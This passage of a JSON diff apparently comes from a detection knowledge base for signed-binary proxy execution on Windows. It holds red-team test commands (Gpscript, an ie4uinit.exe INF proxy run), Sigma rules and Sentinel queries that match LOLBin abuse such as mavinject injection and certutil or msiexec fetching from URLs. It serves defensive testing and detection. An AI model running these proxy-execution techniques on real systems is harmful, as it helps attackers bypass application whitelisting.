"supported_platforms": [ + "windows" + ], + "executor": { + "command": "Gpscript /logon\n", + "name": "command_prompt" + } + }, + { + "name": "Lolbin Gpscript startup option", + "auto_generated_guid": "f8da74bb-21b8-4af9-8d84-f2c8e4a220e3", + "description": "Executes startup scripts configured in Group Policy\nhttps://lolbas-project.github.io/lolbas/Binaries/Gpscript/\nhttps://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Gpscript /startup\n", + "name": "command_prompt" + } + }, + { + "name": "Lolbas ie4uinit.exe use as proxy", + "auto_generated_guid": "13c0804e-615e-43ad-b223-2dfbacd0b0b3", + "description": "Executes commands from a specially prepared ie4uinit.inf file.\nPoc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\nReference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Path_inf": { + "description": "Path to the cab file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\ieuinit.inf" + }, + "Path_ie4uinit": { + "description": "Path to ie4uinit.exe", + "type": "Path", + "default": "c:\\windows\\system32\\ie4uinit.exe" + } + }, + "executor": { + "command": "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy #{Path_inf} %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "cleanup_command": "del %TEMP%\\ie4uinit.exe >nul 2>&1\ndel %TEMP%\\ieuinit.inf >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + }, + { + "name": "Signed Binary Proxy Execution", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "mavinject.exe|SyncAppvPublishingServer.exe" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3and (process_path contains 
\"certutil.exe\"or process_command_line contains \"*certutil*script\\\\:http\\\\[\\\\:\\\\]\\\\/\\\\/*\"or process_path contains \"*\\\\replace.exe\")", + "name": "Signed Binary Proxy Execution Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"mavinject*\\\\/injectrunning\"or process_command_line contains \"mavinject32*\\\\/injectrunning*\"or process_command_line contains \"*certutil*script\\\\:http\\\\[\\\\:\\\\]\\\\/\\\\/*\"or process_command_line contains \"*certutil*script\\\\:https\\\\[\\\\:\\\\]\\\\/\\\\/*\"or process_command_line contains \"*msiexec*http\\\\[\\\\:\\\\]\\\\/\\\\/*\"or process_command_line contains \"*msiexec*https\\\\[\\\\:\\\\]\\\\/\\\\/*\")", + "name": "Signed Binary Proxy Execution Process" + } + ], + "possible_detections": [ + { + "title": "MavInject Process Injection", + "id": "17eb8e57-9983-420d-ad8a-2c4976c22eb8", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool Mavinject32.exe", + "references": [ + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://twitter.com/Hexacorn/status/776122138063409152" + ], + "author": "Florian Roth", + "date": "2018/12/12", + "tags": [ + "attack.t1055", + "attack.t1218" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "* /INJECTRUNNING *" + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Application whitelisting bypass via bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", + "status": "experimental", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Bginfo.yml", + 
"https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\bginfo.exe", + "CommandLine|contains|all": [ + "/popup", + "/nolicprompt" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ] + }, + { + "title": "Possible Application Whitelisting Bypass via WinDbg/CDB as a shellcode runner", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "status": "experimental", + "description": "Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Cdb.yml", + "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\cdb.exe", + "CommandLine|contains": "-cf" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate use of debugging tools" + ] + }, + { + "title": "Devtoolslauncher.exe executes specified binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "experimental", + "description": "The Devtoolslauncher.exe executes other binary", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Devtoolslauncher.yml", + "https://twitter.com/_felamos/status/1179811992841797632" + ], + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "date": "2019/10/12", + "modified": 
"2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "critical", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\devtoolslauncher.exe", + "CommandLine|contains": "LaunchForDeploy" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate use of devtoolslauncher.exe by legitimate user" + ] + }, + { + "title": "Application Whitelisting bypass via dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "status": "experimental", + "description": "Execute C# code located in the consoleapp folder", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Csi.yml", + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\dnx.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate use of dnx.exe by legitimate user" + ] + }, + { + "title": "Application Whitelisting bypass via dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "experimental", + "description": "Detects execution of of Dxcap.exe", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Dxcap.yml", + "https://twitter.com/harr0ey/status/992008180904419328" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + 
"Image|endswith": "\\dxcap.exe", + "CommandLine|contains|all": [ + "-c", + ".exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate execution of dxcap.exe by legitimate user" + ] + }, + { + "title": "Possible Application Whitelisting Bypass via dll loaded by odbcconf.exe", + "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "status": "experimental", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Odbcconf.yml", + "https://twitter.com/Hexacorn/status/1187143326673330176" + ], + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "date": "2019/10/25", + "modified": "2019/11/07", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_1": { + "Image|endswith": "\\odbcconf.exe", + "CommandLine|contains": [ + "-f", + "regsvr" + ] + }, + "selection_2": { + "ParentImage|endswith": "\\odbcconf.exe", + "Image|endswith": "\\rundll32.exe" + }, + "condition": "selection_1 or selection_2" + }, + "level": "medium", + "falsepositives": [ + "Legitimate use of odbcconf.exe by legitimate user" + ] + }, + { + "title": "OpenWith.exe executes specified binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", + "status": "experimental", + "description": "The OpenWith.exe executes other binary", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504" + ], + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "date": "2019/10/12", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "high", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + 
"detection": { + "selection": { + "Image|endswith": "\\OpenWith.exe", + "CommandLine|contains": "/c" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate use of OpenWith.exe by legitimate user" + ] + }, + { + "title": "psr.exe capture screenshots", + "id": "2158f96f-43c2-43cb-952a-ab4580f32382", + "status": "experimental", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/12", + "modified": "2019/11/04", + "tags": [ + "attack.persistence", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\Psr.exe", + "CommandLine|contains": "/start" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ] + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was 
created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": 
[ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system 
components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
